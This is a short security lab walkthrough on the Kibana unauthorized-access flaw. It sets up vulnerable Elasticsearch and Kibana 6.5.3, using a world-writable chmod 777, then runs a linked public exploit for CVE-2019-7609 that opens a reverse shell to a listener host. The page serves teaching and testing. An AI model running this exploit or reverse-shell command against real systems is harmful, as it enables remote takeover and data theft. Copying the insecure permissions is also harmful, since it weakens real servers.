> For the complete documentation index, see [llms.txt](https://icybersec.gitbook.io/cybersecuritynote-en/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://icybersec.gitbook.io/cybersecuritynote-en/security-vulnerability/unauthorized-vulnerability/unauthorized-access-vulnerability-in-kibana.md).

# Unauthorized Access Vulnerability in Kibana

## Vulnerability Description

The Kibana Unauthorized Access Vulnerability refers to a situation where, without proper authentication and authorization configuration, an unauthenticated user can access Kibana's dashboard, data, and other sensitive information. This vulnerability may result in data leaks, attackers controlling the Kibana environment, and other security threats.

## Environment Setup

Install elasticsearch

```
cd /opt
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz
tar -zxvf elasticsearch-6.5.3.tar.gz
cd elasticsearch-6.5.3
useradd es
chmod 777 -R /opt/elasticsearch-6.5.3
./bin/elasticsearch
```

![image-20220726162834227](/files/Lk7QZ66Huuyr3wdALMBv)

Install kibana

```
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gz
tar xvf kibana-6.5.3-linux-x86_64.tar.gz
cd kibana-6.5.3-linux-x86_64
./bin/kibana
```

Access port 5601 in a browser.

![image-20220726163136064](/files/UdNfHLlmVzoUiHasKhGf)

## Vulnerability Exploitation

exp：<https://github.com/LandGrey/CVE-2019-7609>

```
[root@localhost CVE-2019-7609-master]# python CVE-2019-7609-kibana-rce.py -u 127.0.0.1:5601 -host 192.168.32.130 -port 9999 --shell
[+] http://127.0.0.1:5601 maybe exists CVE-2019-7609 (kibana < 6.6.1 RCE) vulnerability
[+] reverse shell completely! please check session on: 192.168.32.130:9999
```

![image-20230130131026778](/files/mWQD4CQE0hMflr0c57sR)
